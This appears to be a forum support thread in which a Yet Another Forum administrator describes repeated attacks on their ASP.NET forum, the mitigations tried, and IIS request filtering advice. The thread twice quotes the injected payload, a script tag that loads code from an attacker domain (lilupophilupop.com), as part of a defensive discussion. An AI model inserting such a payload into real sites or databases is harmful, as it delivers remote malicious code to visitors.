1. removed the install directory

2. changed the database password

3. changed all validaterequest=false to true

4. changed administrator password

5. changed the YAF.ConfigPassword (before removing the install directory)

The forum is till under attack right now. I doubt any viruses on the server as there are a number of yaf forums also hosted there.

Can somebody please give some more light?

Why did you decide that this is an sql injection and not let's say an account hijack?

There are just two administrators of the site. i have changed both passwords and changed all reference to validaterequests=true since attack one.

Attack two came so i completely deleted the install directory (it was just renamed prevoiusly) and changed the database password.

Attack three came so i changed the default editors to bbcode and users will not be able to change editors. and checked if the

<script>

Attack four came so now I am in panic mode.

The nature of the attack was that is was inserting the

<script>

I am using version 1.9.5.6

I can't see the version in downloads. I should know it exactly.

But it really looks like a YAF problem.

Please, tell me exactly which tables were corrupted? The problem is that you can't enter username directly in the version at all. The only exception is the search.

The attack came with the same behaviour at this post:

http://forum.yetanotherforum.net/yaf_postst12938_Has-my-forum-is-been-hacked.aspx 

I am unable to explicitly tell you right now the full list because i have just restored it (maybe if it attacks again? my God i hope not) but I am sure it it in the following tables:

forum_prov_Membership - UserID

forum_Topic - Topic

forum_Topic - TopicImage

the forum_User Email filed was also wiped out as i recall.

This field is not used in YAF code at all and can't be filled at all from WebInterface.

All I can say that the attacker knows your database structure. You should write a trap,

the problem is that it's almost impossible even in theory to make an injection as YAF uses parameters and SPs everywhere in the version.

Switch off YAF search and use external search only for some time. But I still think that the problem is that someone gets access to Run Sql admin area.

And yes i assume the attacker would research something about the YAF db structure prior to attack (since YAF is available for everyone to download). I shudder to think that he / she is among us at this very forum reading this very thread 😨

What I can do now maybe is ti backup every couple of hours. I will post my results here. You've been a great help bbobb. Even for just taking the time to investigate.

http://isc.sans.edu/diary.html?storyid=12127 

It seems to be injecting the following text and even wiping out whole fields:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

It is not localized to YAF but to users of MS SQL, Microsoft IIS, ASP sites and Coldfusion (https://www.mywot.com/en/forum/18320-watch-out-for-lilupophilupop-com-sql-injection-exploit)

I hope we can get a first line defense on this. If anybody is interested, I could pm the generated database script and build it on a controlled environment for examination. I dare not build this on my dev pc.

UPDATE

In IIS go to Request Filtering. You can denay or allow whatever you like there.

Not much of an IIS gal (please be patient), but if i add

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

I was assuming the attack was using something like an article mentioned here:

http://blog.strictly-software.com/2009/10/two-stage-sql-injection-attack.html

In any case I will try as you say. Would you mind telling me the correct way to do it? Under request filtering I see File Extensions, Rules, Hidden Segments, Url, HTTP Verbs and Query Strings. Do i make an entry to all of them?